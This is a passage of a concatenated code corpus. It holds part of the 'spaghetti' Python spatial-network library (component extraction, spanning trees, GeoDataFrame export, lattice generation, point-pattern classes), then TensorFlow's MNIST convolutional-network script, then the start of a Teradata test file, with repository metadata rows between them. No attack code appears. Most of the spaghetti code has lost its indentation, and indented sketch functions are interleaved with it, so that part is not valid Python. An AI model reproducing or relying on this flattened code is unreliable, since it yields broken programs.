`esda documentation <https://pysal.org/esda/generated/esda.Moran.html#esda.Moran>`_
for in-depth descriptions and tutorials.
Parameters
----------
pp_name : str
The name of the point pattern in question.
permutations : int
The number of permutations to perform. Default is ``999``.
graph : bool
Perform the Moran calculation on the graph `W` object
(``True``). Default is ``False``, which performs the
Moran calculation on the network `W` object.
Returns
-------
moran : esda.Moran
A Moran's *I* statistic object results.
y : list
The y-axis (counts).
Examples
--------
Create a network instance.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(in_data=examples.get_path("streets.shp"))
Snap observation points onto the network.
>>> crimes = "crimes"
>>> in_data = examples.get_path(crimes+".shp")
>>> ntw.snapobservations(in_data, crimes, attribute=True)
Compute a Moran's :math:`I` from crime observations.
>>> moran_res, _ = ntw.Moran(crimes)
>>> round(moran_res.I, 6)
0.005193
Notes
-----
See :cite:`moran:_cliff81` and :cite:`esda:_2019` for more details.
"""
# set proper weights attribute
if graph:
w = self.w_graph
else:
w = self.w_network
# Compute the counts
pointpat = self.pointpatterns[pp_name]
counts = self.count_per_link(pointpat.obs_to_arc, graph=graph)
# Build the y vector
y = [counts[i] if i in counts else 0.0 for i in w.neighbors]
# Moran's I
moran = esda.moran.Moran(y, w, permutations=permutations)
return moran, y
def savenetwork(self, filename):
"""Save a network to disk as a binary file.
Parameters
----------
filename : str
The filename where the network should be saved. This should
be a full path or it will be saved in the current directory.
Examples
--------
Create a network instance.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Save out the network instance.
>>> ntw.savenetwork("mynetwork.pkl")
"""
with open(filename, "wb") as networkout:
pickle.dump(self, networkout, protocol=2)
@staticmethod
def loadnetwork(filename):
"""Load a network from a binary file saved on disk.
Parameters
----------
filename : str
The filename where the network is saved.
Returns
-------
self : spaghetti.Network
A pre-computed ``spaghetti`` network object.
"""
with open(filename, "rb") as networkin:
self = pickle.load(networkin)
return self
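# A minimal illustrative sketch of a save/load round trip with the two
# methods above; the file name "mynetwork.pkl" and the bundled "streets.shp"
# example are assumptions chosen only for demonstration.
def _example_save_load_roundtrip():  # pragma: no cover - illustration only
    from libpysal import examples
    ntw = Network(examples.get_path("streets.shp"))
    ntw.savenetwork("mynetwork.pkl")
    restored = Network.loadnetwork("mynetwork.pkl")
    # the restored network carries the same arcs as the original
    assert len(restored.arcs) == len(ntw.arcs)
    return restored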
def extract_component(net, component_id, weightings=None):
"""Extract a single component from a network object.
Parameters
----------
net : spaghetti.Network
Full network object.
component_id : int
The ID of the desired network component.
weightings : {dict, bool}
See the ``weightings`` keyword argument in ``spaghetti.Network``.
Returns
-------
cnet : spaghetti.Network
The pruned network containing the component specified in
``component_id``.
Notes
-----
Point patterns are not reassigned when extracting a component. Therefore,
component extraction should be performed prior to snapping any point
sets onto the network. Also, if the ``spaghetti.Network`` object
has ``distance_matrix`` or ``network_trees`` attributes, they are
deleted and must be computed again on the single component.
Examples
--------
Instantiate a network object.
>>> from libpysal import examples
>>> import spaghetti
>>> snow_net = examples.get_path("Soho_Network.shp")
>>> ntw = spaghetti.Network(in_data=snow_net, extractgraph=False)
The network is not fully connected.
>>> ntw.network_fully_connected
False
Examine the number of network components.
>>> ntw.network_n_components
45
Extract the longest component.
>>> longest = spaghetti.extract_component(ntw, ntw.network_longest_component)
>>> longest.network_n_components
1
>>> longest.network_component_lengths
{0: 13508.169276875526}
"""
def _reassign(attr, cid):
"""Helper for reassigning attributes."""
# set for each attribute(s)
if attr == "_fully_connected":
_val = [True for objt in obj_type]
attr = [objt + attr for objt in obj_type]
elif attr == "_n_components":
_val = [1 for objt in obj_type]
attr = [objt + attr for objt in obj_type]
elif attr in ["_longest_component", "_largest_component"]:
_val = [cid for objt in obj_type]
attr = [objt + attr for objt in obj_type]
elif attr == "vertex_list":
# reassigns vertex list + network, graph component vertices
supp = [objt + "_component_vertices" for objt in obj_type]
_val = [getattr(cnet, supp[0])[cid]]
_val += [{cid: getattr(cnet, s)[cid]} for s in supp]
attr = [attr] + supp
elif attr == "vertex_coords":
# reassigns both vertex_coords and vertices
supp = getattr(cnet, "vertex_list")
_val = [{k: v for k, v in getattr(cnet, attr).items() if k in supp}]
_val += [{v: k for k, v in _val[0].items()}]
attr = [attr, "vertices"]
elif attr == "_component_vertex_count":
# reassigns both network and graph _component_vertex_count
supp = len(getattr(cnet, "vertex_list"))
_val = [{cid: supp} for objt in obj_type]
attr = [objt + attr for objt in obj_type]
elif attr == "adjacencylist":
supp_adj = copy.deepcopy(list(getattr(cnet, attr).keys()))
supp_vtx = getattr(cnet, "vertex_list")
supp_rmv = [v for v in supp_adj if v not in supp_vtx]
[getattr(cnet, attr).pop(s) for s in supp_rmv]
return
elif attr == "_component_is_ring":
# reassigns both network and graph _component_is_ring
supp = [getattr(cnet, objt + attr) for objt in obj_type]
_val = [{cid: s[cid]} for s in supp]
attr = [objt + attr for objt in obj_type]
elif attr == "non_articulation_points":
supp_vtx = getattr(cnet, "vertex_list")
_val = [[s for s in getattr(cnet, attr) if s in supp_vtx]]
attr = [attr]
elif attr == "_component2":
# reassigns both network and graph _component2 attributes
supp = [_n + "_component2" + _a]
if hasgraph:
supp += [_g + "_component2" + _e]
_val = [{cid: getattr(cnet, s)[cid]} for s in supp]
attr = supp
elif attr == "arcs":
# reassigns both arcs and edges
c2 = "_component2"
supp = [_n + c2 + _a]
if hasgraph:
supp += [_g + c2 + _e]
_val = [getattr(cnet, s)[cid] for s in supp]
attr = [attr]
if hasgraph:
attr += ["edges"]
elif attr == "_component_labels":
# reassigns both network and graph _component_labels
supp = [len(getattr(cnet, o + "s")) for o in obj]
_val = [numpy.array([cid] * s) for s in supp]
attr = [objt + attr for objt in obj_type]
elif attr == "_component_lengths":
# reassigns both network and graph _component_lengths
supp = [objt + attr for objt in obj_type]
_val = [{cid: getattr(cnet, s)[cid]} for s in supp]
attr = supp
elif attr == "_lengths":
# reassigns both arc and edge _lengths
supp_name = [o + attr for o in obj]
supp_lens = [getattr(cnet, s) for s in supp_name]
supp_link = [getattr(cnet, o + "s") for o in obj]
supp_ll = list(zip(supp_lens, supp_link))
_val = [{k: v for k, v in l1.items() if k in l2} for l1, l2 in supp_ll]
attr = supp_name
# reassign attributes
for a, av in zip(attr, _val):
setattr(cnet, a, av)
# provide warning (for now) if the network contains a point pattern
if getattr(net, "pointpatterns"):
        msg = "There is at least one point pattern associated with the network."
msg += " Component extraction should be performed prior to snapping"
msg += " point patterns to the network object; failing to do so may"
msg += " lead to unexpected results."
warnings.warn(msg)
    # warn (for now) if cost matrix or shortest path tree attributes exist
dm, nt = "distance_matrix", "network_trees"
if hasattr(net, dm) or hasattr(net, nt):
msg = "Either one or both (%s, %s) attributes" % (dm, nt)
msg += " are present and will be deleted. These must be"
msg += " recalculated following component extraction."
warnings.warn(msg)
for attr in [dm, nt]:
if hasattr(net, attr):
_attr = getattr(net, attr)
del _attr
# make initial copy of the network
cnet = copy.deepcopy(net)
# set labels
_n, _a, _g, _e = "network", "arc", "graph", "edge"
obj_type = [_n]
obj = [_a]
hasgraph = False
if hasattr(cnet, "w_graph"):
obj_type += [_g]
obj += [_e]
hasgraph = True
# attributes to reassign
update_attributes = [
"_fully_connected",
"_n_components",
"_longest_component",
"_largest_component",
"vertex_list",
"vertex_coords",
"_component_vertex_count",
"adjacencylist",
"_component_is_ring",
"_component2",
"arcs",
"_component_lengths",
"_lengths",
"_component_labels",
]
if hasgraph:
update_attributes.append("non_articulation_points")
# reassign attributes
for attribute in update_attributes:
_reassign(attribute, component_id)
# recreate spatial weights
cnet.w_network = cnet.contiguityweights(graph=False, weightings=weightings)
if hasgraph:
cnet.w_graph = cnet.contiguityweights(graph=True, weightings=weightings)
return cnet
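# A minimal illustrative sketch of the workflow recommended in the Notes of
# ``extract_component``: prune to a single component *before* snapping point
# observations. ``point_shp`` is a hypothetical point shapefile path supplied
# by the caller; the Soho network path mirrors the docstring example.
def _example_extract_then_snap(point_shp):  # pragma: no cover - illustration only
    from libpysal import examples
    net = Network(in_data=examples.get_path("Soho_Network.shp"), extractgraph=False)
    # prune to the longest connected component first ...
    longest = extract_component(net, net.network_longest_component)
    # ... and only then snap the observations onto the pruned network
    longest.snapobservations(point_shp, "observations")
    return longest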
def spanning_tree(net, method="sort", maximum=False, silence_warnings=True):
"""Extract a minimum or maximum spanning tree from a network.
Parameters
----------
net : spaghetti.Network
Instance of a network object.
method : str
Method for determining spanning tree. Currently, the only
supported method is 'sort', which sorts the network arcs
by length prior to building intermediary networks and checking
for cycles within the tree/subtrees. Future methods may
        include linear programming approaches, etc.
maximum : bool
When ``True`` a maximum spanning tree is created. When ``False``
a minimum spanning tree is created. Default is ``False``.
silence_warnings : bool
        Silence warnings, such as the warning raised when there is more
        than one connected component. Default is ``True`` due to the
        nature of constructing a minimum spanning tree.
Returns
-------
net : spaghetti.Network
Pruned instance of the network object.
Notes
-----
For in-depth background and details see
:cite:`GrahamHell_1985`,
:cite:`AhujaRavindraK`, and
:cite:`Okabe2012`.
See also
--------
networkx.algorithms.tree.mst
scipy.sparse.csgraph.minimum_spanning_tree
Examples
--------
Create a network instance.
>>> from libpysal import cg
>>> import spaghetti
>>> p00 = cg.Point((0,0))
>>> lines = [cg.Chain([p00, cg.Point((0,3)), cg.Point((4,0)), p00])]
>>> ntw = spaghetti.Network(in_data=lines)
Extract the minimum spanning tree.
>>> minst_net = spaghetti.spanning_tree(ntw)
>>> min_len = sum(minst_net.arc_lengths.values())
>>> min_len
7.0
Extract the maximum spanning tree.
>>> maxst_net = spaghetti.spanning_tree(ntw, maximum=True)
>>> max_len = sum(maxst_net.arc_lengths.values())
>>> max_len
9.0
>>> max_len > min_len
True
"""
# (un)silence warning
weights_kws = {"silence_warnings": silence_warnings}
# do not extract graph object while testing for cycles
net_kws = {"extractgraph": False, "weights_kws": weights_kws}
# if the network has no cycles, it is already a spanning tree
if util.network_has_cycle(net.adjacencylist):
if method.lower() == "sort":
spanning_tree = mst_weighted_sort(net, maximum, net_kws)
else:
msg = "'%s' not a valid method for minimum spanning tree creation"
raise ValueError(msg % method)
# instantiate the spanning tree as a network object
net = Network(in_data=spanning_tree, weights_kws=weights_kws)
return net
def mst_weighted_sort(net, maximum, net_kws):
"""Extract a minimum or maximum spanning tree from a network used
the length-weighted sort method.
Parameters
----------
net : spaghetti.Network
See ``spanning_tree()``.
maximum : bool
See ``spanning_tree()``.
net_kws : dict
        Keyword arguments for instantiating a ``spaghetti.Network``.
Returns
-------
spanning_tree : list
        All network arcs that are members of the spanning tree.
Notes
-----
This function is based on the method found in Chapter 3
Section 4.3 of :cite:`Okabe2012`.
"""
# network arcs dictionary sorted by arc length
sort_kws = {"key": net.arc_lengths.get, "reverse": maximum}
sorted_lengths = sorted(net.arc_lengths, **sort_kws)
# the spanning tree is initially empty
spanning_tree = []
    # iterate over the length-sorted network arcs
while sorted_lengths:
_arc = sorted_lengths.pop(0)
# make a spatial representation of an arc
chain_rep = util.chain_constr(net.vertex_coords, [_arc])
# current set of network arcs as libpysal.cg.Chain
_chains = spanning_tree + chain_rep
# current network iteration
_ntw = Network(in_data=_chains, **net_kws)
# determine if the network contains a cycle
if not util.network_has_cycle(_ntw.adjacencylist):
# If no cycle is present, add the arc to the spanning tree
spanning_tree.extend(chain_rep)
return spanning_tree
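# A standalone sketch of the same length-weighted sort principle, but with a
# disjoint-set (union-find) cycle test in place of rebuilding intermediary
# networks. This illustrates the general technique only; it is not how
# ``mst_weighted_sort`` is implemented.
def _mst_union_find_sketch(arc_lengths, maximum=False):  # pragma: no cover
    """``arc_lengths`` maps ``(vertex_a, vertex_b)`` tuples to arc lengths."""
    parent = {}
    def _find(v):
        parent.setdefault(v, v)
        while parent[v] != v:
            # path halving keeps the lookup trees shallow
            parent[v] = parent[parent[v]]
            v = parent[v]
        return v
    tree = []
    # visit arcs from shortest to longest (reversed for a maximum tree)
    for arc in sorted(arc_lengths, key=arc_lengths.get, reverse=maximum):
        root_a, root_b = _find(arc[0]), _find(arc[1])
        if root_a != root_b:
            # joining two distinct subtrees can never create a cycle
            parent[root_a] = root_b
            tree.append(arc)
    return tree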
@requires("geopandas", "shapely")
def element_as_gdf(
net,
vertices=False,
arcs=False,
pp_name=None,
snapped=False,
routes=None,
id_col="id",
geom_col="geometry",
):
"""Return a ``geopandas.GeoDataFrame`` of network elements. This can be
(a) the vertices of a network; (b) the arcs of a network; (c) both the
vertices and arcs of the network; (d) the raw point pattern associated
with the network; (e) the snapped point pattern of (d); or (f) the
shortest path routes between point observations.
Parameters
----------
net : spaghetti.Network
A `spaghetti` network object.
vertices : bool
Extract the network vertices (``True``). Default is ``False``.
arcs : bool
Extract the network arcs (``True``). Default is ``False``.
pp_name : str
Name of the ``network.PointPattern`` to extract.
Default is ``None``.
snapped : bool
If extracting a ``network.PointPattern``, set to ``True`` for
snapped point locations along the network. Default is ``False``.
routes : dict
See ``paths`` from ``spaghetti.Network.shortest_paths``.
Default is ``None``.
id_col : str
``geopandas.GeoDataFrame`` column name for IDs. Default is ``"id"``.
When extracting routes this creates an (origin, destination) tuple.
geom_col : str
``geopandas.GeoDataFrame`` column name for geometry. Default is
``"geometry"``.
Raises
------
KeyError
In order to extract a ``network.PointPattern`` it must already
be a part of the network object. This exception is raised
when a ``network.PointPattern`` is being extracted that does
not exist within the network object.
Returns
-------
points : geopandas.GeoDataFrame
Network point elements (either vertices or ``network.PointPattern``
points) as a ``geopandas.GeoDataFrame`` of ``shapely.geometry.Point``
        objects with an ``"id"`` column and ``"geometry"`` column.
If the network object has a ``network_component_vertices`` attribute,
then component labels are also added in a column.
lines : geopandas.GeoDataFrame
Network arc elements as a ``geopandas.GeoDataFrame`` of
``shapely.geometry.LineString`` objects with an ``"id"``
column and ``"geometry"`` column. If the network object has
a ``network_component_labels`` attribute, then component labels
are also added in a column.
paths : geopandas.GeoDataFrame
Shortest path routes along network arc elements as a
``geopandas.GeoDataFrame`` of ``shapely.geometry.LineString``
objects with an ``"id"`` (see ``spaghetti.Network.shortest_paths()``)
column and ``"geometry"`` column.
Notes
-----
When both network vertices and arcs are desired, the variable
declaration must be in the order: <vertices>, <arcs>.
This function requires ``geopandas``.
See also
--------
geopandas.GeoDataFrame
Examples
--------
Instantiate a network object.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Extract the network elements (vertices and arcs) as
``geopandas.GeoDataFrame`` objects.
>>> vertices_df, arcs_df = spaghetti.element_as_gdf(
... ntw, vertices=True, arcs=True
... )
Examine the first vertex. It is a member of the component labeled ``0``.
>>> vertices_df.loc[0]
id 0
geometry POINT (728368.04762 877125.89535)
comp_label 0
Name: 0, dtype: object
Calculate the total length of the network.
>>> arcs_df.geometry.length.sum()
104414.09200823458
"""
# shortest path routes between observations
if routes:
paths = util._routes_as_gdf(routes, id_col, geom_col)
return paths
    # a vertices placeholder is needed to create network arc LineStrings
    # even if only the network arcs are desired.
vertices_for_arcs = False
if arcs and not vertices:
vertices_for_arcs = True
# vertices/nodes/points
if vertices or vertices_for_arcs or pp_name:
points = util._points_as_gdf(
net,
vertices,
vertices_for_arcs,
pp_name,
snapped,
id_col=id_col,
geom_col=geom_col,
)
# return points geodataframe if arcs not specified or
# if extracting `PointPattern` points
if not arcs or pp_name:
return points
# arcs
arcs = util._arcs_as_gdf(net, points, id_col=id_col, geom_col=geom_col)
if vertices_for_arcs:
return arcs
else:
return points, arcs
def regular_lattice(bounds, nh, nv=None, exterior=False):
"""Generate a regular lattice of line segments
(`libpysal.cg.Chain objects <https://pysal.org/libpysal/generated/libpysal.cg.Chain.html#libpysal.cg.Chain>`_).
Parameters
----------
bounds : {tuple, list}
Area bounds in the form - <minx,miny,maxx,maxy>.
nh : int
The number of internal horizontal lines of the lattice.
nv : int
The number of internal vertical lines of the lattice. Defaults to
``nh`` if left as None.
exterior : bool
Flag for including the outer bounding box segments. Default is False.
Returns
-------
lattice : list
The ``libpysal.cg.Chain`` objects forming a regular lattice.
Notes
-----
The ``nh`` and ``nv`` parameters do not include the external
line segments. For example, setting ``nh=3, nv=2, exterior=True``
will result in 5 horizontal line sets and 4 vertical line sets.
Examples
--------
Create a 5x5 regular lattice with an exterior
>>> import spaghetti
>>> lattice = spaghetti.regular_lattice((0,0,4,4), 3, exterior=True)
>>> lattice[0].vertices
[(0.0, 0.0), (1.0, 0.0)]
Create a 5x5 regular lattice without an exterior
>>> lattice = spaghetti.regular_lattice((0,0,5,5), 3, exterior=False)
>>> lattice[-1].vertices
[(3.75, 3.75), (3.75, 5.0)]
Create a 7x9 regular lattice with an exterior from the
bounds of ``streets.shp``.
    >>> import libpysal
    >>> path = libpysal.examples.get_path("streets.shp")
>>> shp = libpysal.io.open(path)
>>> lattice = spaghetti.regular_lattice(shp.bbox, 5, nv=7, exterior=True)
>>> lattice[0].vertices
[(723414.3683108028, 875929.0396895551), (724286.1381211297, 875929.0396895551)]
"""
# check for bounds validity
if len(bounds) != 4:
bounds_len = len(bounds)
msg = "The 'bounds' parameter is %s elements " % bounds_len
msg += "but should be exactly 4 - <minx,miny,maxx,maxy>."
raise RuntimeError(msg)
    # set and validate the internal line counts
if not nv:
nv = nh
try:
nh, nv = int(nh), int(nv)
except TypeError:
nlines_types = type(nh), type(nv)
msg = "The 'nh' and 'nv' parameters (%s, %s) " % nlines_types
msg += "could not be converted to integers."
raise TypeError(msg)
# bounding box line lengths
len_h, len_v = bounds[2] - bounds[0], bounds[3] - bounds[1]
# horizontal and vertical increments
incr_h, incr_v = len_h / float(nh + 1), len_v / float(nv + 1)
# define the horizontal and vertical space
space_h = [incr_h * slot for slot in range(nv + 2)]
space_v = [incr_v * slot for slot in range(nh + 2)]
# create vertical and horizontal lines
lines_h = util.build_chains(space_h, space_v, exterior, bounds)
lines_v = util.build_chains(space_h, space_v, exterior, bounds, h=False)
# combine into one list
lattice = lines_h + lines_v
return lattice
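# A minimal illustrative sketch tying the pieces above together: build a small
# regular lattice, wrap it in a network, and pull the elements back out as
# GeoDataFrames. Requires ``geopandas``; the lattice bounds are arbitrary
# values chosen only for demonstration.
def _example_lattice_to_gdf():  # pragma: no cover - illustration only
    lattice = regular_lattice((0, 0, 4, 4), 3, exterior=True)
    net = Network(in_data=lattice)
    vertices_df, arcs_df = element_as_gdf(net, vertices=True, arcs=True)
    return vertices_df, arcs_df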
class PointPattern:
"""A stub point pattern class used to store a point pattern.
Note from the original author of ``pysal.network``:
This class is monkey patched with network specific attributes when the
points are snapped to a network. In the future this class may be
replaced with a generic point pattern class.
Parameters
----------
in_data : {str, list, tuple, libpysal.cg.Point, geopandas.GeoDataFrame}
The input geographic data. Either (1) a path to a shapefile
(str); (2) an iterable containing ``libpysal.cg.Point``
objects; (3) a single ``libpysal.cg.Point``; or
(4) a ``geopandas.GeoDataFrame``.
idvariable : str
Field in the shapefile to use as an ID variable.
attribute : bool
A flag to indicate whether all attributes are tagged to this
class (``True``) or excluded (``False``). Default is ``False``.
Attributes
----------
points : dict
Keys are the point IDs (int). Values are the :math:`(x,y)`
coordinates (tuple).
npoints : int
The number of points.
obs_to_arc : dict
Keys are arc IDs (tuple). Values are snapped point information
(``dict``). Within the snapped point information (``dict``)
keys are observation IDs (``int``), and values are snapped
coordinates.
obs_to_vertex : list
List of incident network vertices to snapped observation points
converted from a ``default_dict``. Originally in the form of
paired left/right nearest network vertices {netvtx1: obs_id1,
netvtx2: obs_id1, netvtx1: obs_id2... netvtx1: obs_idn}, then
simplified to a list in the form
[netvtx1, netvtx2, netvtx1, netvtx2, ...].
dist_to_vertex : dict
        Keys are observation IDs (``int``). Values are distance lookup
(``dict``). Within distance lookup (``dict``) keys are the two
incident vertices of the arc and values are distance to each of
those arcs.
snapped_coordinates : dict
Keys are the point IDs (int). Values are the snapped :math:`(x,y)`
coordinates (tuple).
snap_dist : bool
Flag as ``True`` to include the distance from the original
location to the snapped location along the network. Default
is ``False``.
"""
def __init__(self, in_data=None, idvariable=None, attribute=False):
# initialize points dictionary and counter
self.points = {}
self.npoints = 0
# determine input point data type
in_dtype = str(type(in_data)).split("'")[1]
# flag for points from a shapefile
from_shp = False
# flag for points as libpysal.cg.Point objects
is_libpysal_points = False
supported_iterables = ["list", "tuple"]
# type error message
msg = "'%s' not supported for point pattern instantiation."
# set appropriate geometries
if in_dtype == "str":
from_shp = True
elif in_dtype in supported_iterables:
dtype = str(type(in_data[0])).split("'")[1]
if dtype == "libpysal.cg.shapes.Point":
is_libpysal_points = True
else:
raise TypeError(msg % dtype)
elif in_dtype == "libpysal.cg.shapes.Point":
in_data = [in_data]
is_libpysal_points = True
elif in_dtype == "geopandas.geodataframe.GeoDataFrame":
from_shp = False
else:
raise TypeError(msg % in_dtype)
# either set native point ID from dataset or create new IDs
if idvariable and not is_libpysal_points:
ids = weights.util.get_ids(in_data, idvariable)
else:
ids = None
# extract the point geometries
if not is_libpysal_points:
if from_shp:
pts = open(in_data)
else:
pts_objs = list(in_data.geometry)
pts = [cg.shapes.Point((p.x, p.y)) for p in pts_objs]
else:
pts = in_data
# fetch attributes if requested
if attribute and not is_libpysal_points:
# open the database file if data is from shapefile
if from_shp:
dbname = os.path.splitext(in_data)[0] + ".dbf"
db = open(dbname)
# if data is from a GeoDataFrame, drop the geometry column
# and declare attribute values as a list of lists
else:
db = in_data.drop(in_data.geometry.name, axis=1).values.tolist()
db = [[d] for d in db]
else:
db = None
# iterate over all points
for i, pt in enumerate(pts):
# IDs, attributes
if ids and db is not None:
self.points[ids[i]] = {"coordinates": pt, "properties": db[i]}
# IDs, no attributes
elif ids and db is None:
self.points[ids[i]] = {"coordinates": pt, "properties": None}
# no IDs, attributes
elif not ids and db is not None:
self.points[i] = {"coordinates": pt, "properties": db[i]}
# no IDs, no attributes
else:
self.points[i] = {"coordinates": pt, "properties": None}
# close the shapefile and database file
# if the input data is a .shp
if from_shp:
pts.close()
if db:
db.close()
# record number of points
self.npoints = len(self.points.keys())
class SimulatedPointPattern:
"""Note from the original author of ``pysal.network``:
Struct style class to mirror the ``PointPattern`` class.
If the ``PointPattern`` class has methods, it might make
sense to make this a child of that class. This class is not intended
to be used by the external user.
Attributes
----------
npoints : int
The number of points.
obs_to_arc : dict
Keys are arc IDs (tuple). Values are snapped point information
(dict). Within the snapped point information (dict)
keys are observation IDs (int), and values are snapped
coordinates.
obs_to_vertex : list
List of incident network vertices to snapped observation points
converted from a default_dict. Originally in the form of
paired left/right nearest network vertices {netvtx1: obs_id1,
netvtx2: obs_id1, netvtx1: obs_id2... netvtx1: obs_idn}, then
simplified to a list in the form
[netvtx1, netvtx2, netvtx1, netvtx2, ...].
dist_to_vertex : dict
        Keys are observation IDs (int). Values are distance lookup
(dict). Within distance lookup (dict) keys are the two
incident vertices of the arc and values are distance to each of
those arcs.
snapped_coordinates : dict
Keys are the point IDs (int). Values are the snapped :math:`(x,y)`
coordinates (tuple).
snap_dist : bool
Flag as ``True`` to include the distance from the original
location to the snapped location along the network. Default
is ``False``.
"""
def __init__(self):
# duplicate post-snapping PointPattern class structure
self.npoints = 0
self.obs_to_arc = {}
self.obs_to_vertex = defaultdict(list)
self.dist_to_vertex = {}
self.snapped_coordinates = {}
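# A minimal illustrative sketch: instantiate a ``PointPattern`` directly from
# ``libpysal.cg.Point`` objects, one of the supported input types described in
# the class docstring. The coordinates are arbitrary demonstration values.
def _example_pointpattern_from_points():  # pragma: no cover - illustration only
    pts = [cg.Point((0.0, 0.0)), cg.Point((1.0, 2.0)), cg.Point((3.0, 1.5))]
    pattern = PointPattern(in_data=pts)
    # point IDs are generated sequentially when no ``idvariable`` is given
    return pattern.npoints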
|
official/mnist/mnist.py | TuKJet/models | 3,326 | 16319 | <filename>official/mnist/mnist.py<gh_stars>1000+
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convolutional Neural Network Estimator for MNIST, built with tf.layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import sys
import tensorflow as tf
import dataset
class Model(object):
"""Class that defines a graph to recognize digits in the MNIST dataset."""
def __init__(self, data_format):
"""Creates a model for classifying a hand-written digit.
Args:
data_format: Either 'channels_first' or 'channels_last'.
'channels_first' is typically faster on GPUs while 'channels_last' is
typically faster on CPUs. See
https://www.tensorflow.org/performance/performance_guide#data_formats
"""
if data_format == 'channels_first':
self._input_shape = [-1, 1, 28, 28]
else:
assert data_format == 'channels_last'
self._input_shape = [-1, 28, 28, 1]
self.conv1 = tf.layers.Conv2D(
32, 5, padding='same', data_format=data_format, activation=tf.nn.relu)
self.conv2 = tf.layers.Conv2D(
64, 5, padding='same', data_format=data_format, activation=tf.nn.relu)
self.fc1 = tf.layers.Dense(1024, activation=tf.nn.relu)
self.fc2 = tf.layers.Dense(10)
self.dropout = tf.layers.Dropout(0.4)
self.max_pool2d = tf.layers.MaxPooling2D(
(2, 2), (2, 2), padding='same', data_format=data_format)
def __call__(self, inputs, training):
"""Add operations to classify a batch of input images.
Args:
inputs: A Tensor representing a batch of input images.
training: A boolean. Set to True to add operations required only when
training the classifier.
Returns:
A logits Tensor with shape [<batch_size>, 10].
"""
y = tf.reshape(inputs, self._input_shape)
y = self.conv1(y)
y = self.max_pool2d(y)
y = self.conv2(y)
y = self.max_pool2d(y)
y = tf.layers.flatten(y)
y = self.fc1(y)
y = self.dropout(y, training=training)
return self.fc2(y)
def model_fn(features, labels, mode, params):
"""The model_fn argument for creating an Estimator."""
model = Model(params['data_format'])
image = features
if isinstance(image, dict):
image = features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
logits = model(image, training=False)
predictions = {
'classes': tf.argmax(logits, axis=1),
'probabilities': tf.nn.softmax(logits),
}
return tf.estimator.EstimatorSpec(
mode=tf.estimator.ModeKeys.PREDICT,
predictions=predictions,
export_outputs={
'classify': tf.estimator.export.PredictOutput(predictions)
})
if mode == tf.estimator.ModeKeys.TRAIN:
optimizer = tf.train.AdamOptimizer(learning_rate=1e-4)
logits = model(image, training=True)
loss = tf.losses.softmax_cross_entropy(onehot_labels=labels, logits=logits)
accuracy = tf.metrics.accuracy(
labels=tf.argmax(labels, axis=1), predictions=tf.argmax(logits, axis=1))
# Name the accuracy tensor 'train_accuracy' to demonstrate the
# LoggingTensorHook.
tf.identity(accuracy[1], name='train_accuracy')
tf.summary.scalar('train_accuracy', accuracy[1])
return tf.estimator.EstimatorSpec(
mode=tf.estimator.ModeKeys.TRAIN,
loss=loss,
train_op=optimizer.minimize(loss, tf.train.get_or_create_global_step()))
if mode == tf.estimator.ModeKeys.EVAL:
logits = model(image, training=False)
loss = tf.losses.softmax_cross_entropy(onehot_labels=labels, logits=logits)
return tf.estimator.EstimatorSpec(
mode=tf.estimator.ModeKeys.EVAL,
loss=loss,
eval_metric_ops={
'accuracy':
tf.metrics.accuracy(
labels=tf.argmax(labels, axis=1),
predictions=tf.argmax(logits, axis=1)),
})
def main(unused_argv):
data_format = FLAGS.data_format
if data_format is None:
data_format = ('channels_first'
if tf.test.is_built_with_cuda() else 'channels_last')
mnist_classifier = tf.estimator.Estimator(
model_fn=model_fn,
model_dir=FLAGS.model_dir,
params={
'data_format': data_format
})
# Train the model
def train_input_fn():
# When choosing shuffle buffer sizes, larger sizes result in better
# randomness, while smaller sizes use less memory. MNIST is a small
# enough dataset that we can easily shuffle the full epoch.
ds = dataset.train(FLAGS.data_dir)
ds = ds.cache().shuffle(buffer_size=50000).batch(FLAGS.batch_size).repeat(
FLAGS.train_epochs)
(images, labels) = ds.make_one_shot_iterator().get_next()
return (images, labels)
# Set up training hook that logs the training accuracy every 100 steps.
tensors_to_log = {'train_accuracy': 'train_accuracy'}
logging_hook = tf.train.LoggingTensorHook(
tensors=tensors_to_log, every_n_iter=100)
mnist_classifier.train(input_fn=train_input_fn, hooks=[logging_hook])
# Evaluate the model and print results
def eval_input_fn():
return dataset.test(FLAGS.data_dir).batch(
FLAGS.batch_size).make_one_shot_iterator().get_next()
eval_results = mnist_classifier.evaluate(input_fn=eval_input_fn)
print()
print('Evaluation results:\n\t%s' % eval_results)
# Export the model
if FLAGS.export_dir is not None:
image = tf.placeholder(tf.float32, [None, 28, 28])
input_fn = tf.estimator.export.build_raw_serving_input_receiver_fn({
'image': image,
})
mnist_classifier.export_savedmodel(FLAGS.export_dir, input_fn)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--batch_size',
type=int,
default=100,
help='Number of images to process in a batch')
parser.add_argument(
'--data_dir',
type=str,
default='/tmp/mnist_data',
help='Path to directory containing the MNIST dataset')
parser.add_argument(
'--model_dir',
type=str,
default='/tmp/mnist_model',
help='The directory where the model will be stored.')
parser.add_argument(
'--train_epochs', type=int, default=40, help='Number of epochs to train.')
parser.add_argument(
'--data_format',
type=str,
default=None,
choices=['channels_first', 'channels_last'],
help='A flag to override the data format used in the model. channels_first '
'provides a performance boost on GPU but is not always compatible '
'with CPU. If left unspecified, the data format will be chosen '
'automatically based on whether TensorFlow was built for CPU or GPU.')
parser.add_argument(
'--export_dir',
type=str,
help='The directory where the exported SavedModel will be stored.')
tf.logging.set_verbosity(tf.logging.INFO)
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
test/test_tdodbc.py | Teradata/PyTd | 133 | 16354 | # The MIT License (MIT)
#
# Copyright (c) 2015 by Teradata
#
